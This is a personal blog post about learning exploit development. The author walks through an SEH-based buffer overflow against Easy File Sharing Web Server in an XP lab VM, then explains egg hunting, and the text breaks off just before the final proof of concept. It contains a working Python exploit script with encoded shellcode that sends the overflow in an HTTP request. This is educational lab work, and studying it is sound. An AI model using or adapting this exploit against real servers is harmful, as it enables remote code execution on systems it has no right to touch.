Let me just start off & say this is the coolest thing I’ve done thus far while learning exploit development! It’s in-fucking-sane & I love it. As usual, the “Binary Gods” are the only reason why a mere mortal like myself can absorb and comprehend the material that they’ve so graciously laid out on a silver platter. Man everyday I appreciate, respect & look up to those guys behind these resources. They’re the real MVP’s. In case you didn’t know, I’m speaking about the Corelan’s, FuzzySecurity’s, SecuritySift’s, ExploitDB’s and the other countless resources I pillage daily a quest to understand more. You should probably be reading something they produced not this! LMAO – anyway’s welcome, Let’s Rock.
Today’s a weeknight & we’re lazy so we’ll be tackling a remote exploit but all from the same system lmao. In addition there is no reverse shell. I remember in the beginning, that’s the only type of payload I’d go for, usually a Meterpreter, as if I was exploiting anyone besides myself. Nowadays showing execution hijacking & code execution suffices so I use (what an old me would have called corny) a calculator. Ties back into the laziness, I never have to update an LHOST or PORT hehe. Application is Easy File Sharing Web Server running inside an XP SP3 VM inside of VMWare Fusion. Here’s the app:
[read more=”Click here to Read More” less=”Read Less”]
So it’s a web server if you hit the IP you get a login page which doesn’t really matter. If you haven’t read SEH Technique then you probably should, I’m not going to go into detail about. This exploit begins the same as that one but it’s in a different piece of software.
So let’s level the playing field before the fun starts. I tried for about a hour w/ a direct EIP overwrite and JMP <REG> that didn’t work. Not really sure why, anyway it was a good time to test the SEH based way. I was able to overwrite the SEH handler, determine the offset, overwrite the nSEH with a short jmp, and overwrite the SEH with a pop pop rtn, in turn gaining control of execution. All is good, but since this is a post on eggs you probably guessed that this is just the beginning. Correct! Anyways here’s the PoC for the SEH thus far:
import socket
import os
from struct import pack
#https://www.exploit-db.com/exploits/42186/
crash1 = “A” * 4061
#nextseh – short jmp 6bytes
crash1 += “\x90\x90\xeb\x06”
#handler !mona seh -> pop pop rtn 0x10010334
crash1 += pack(“<L”,0x10010334)
crash1 += “\x90” * 50
crash1 += (“\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49” +
“\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56” +
“\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41” +
“\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42” +
“\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a” +
“\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47” +
“\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c” +
“\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a” +
“\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50” +
“\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43” +
“\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a” +
“\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c” +
“\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44” +
“\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c” +
“\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47” +
“\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50” +
“\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44” +
“\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43” +
“\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42” +
“\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b” +
“\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45” +
“\x31\x42\x4c\x42\x43\x45\x50\x41\x41”)
print “[+] Length of crash1 ” + str(len(crash1))
crash1 += “C” * (5000 – len(crash1))
payload = “GET ” + crash1 + ” HTTP/1.1\r\n”
payload += “Host: 172.16.192.163\r\n”
payload += “User-Agent: Mozilla/5.0(X11; Linux x86_64;rv:43.0) Gecko 2001001001 Firfox/43.0 Iceweasle/43.0\r\n”
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((“172.16.192.163”, 80))
print “[+] Sending Payload …”
s.send(payload)
s.close()
Sometimes when you overflow a buffer the initial space that’s deterministic is small, a few hundred bytes and other parts of your buffer (larger part) end up in memory but at non deterministic places. Maybe you could pop a calc but that’s not cool in real life. There are other alternatives that’s an exercise to the reader to seek out.
Egg hunting which could be thought about as staged shellcode, uses that initial small determinism buffer to include a piece of shellcode that “hunts” through memory searching for the egg, which is just a unique string repeated twice prepended to your shellcode (that ends up in the larger buffer that could be anywhere). Logic for this post roughly goes like:
- Overwrite nSEH & SEH and place Egg Hunter shellcode to be where the short jmp will be, inject larger buffer also
- Egg Hunter will incrementally search through memory abusing a system cause to determine first
- Is this memory address valid
- nasty things can happen when you try and de-reference a bogus pointer (try lol)
- Is this our egg
- If so, do a dance … JK if so, begin execution (our shellcode is right behind)
- if not, loop back & increment memory and repeat the process
- Is this memory address valid
It surprised me how fast it is ~4 seconds. Here’s the final PoC:
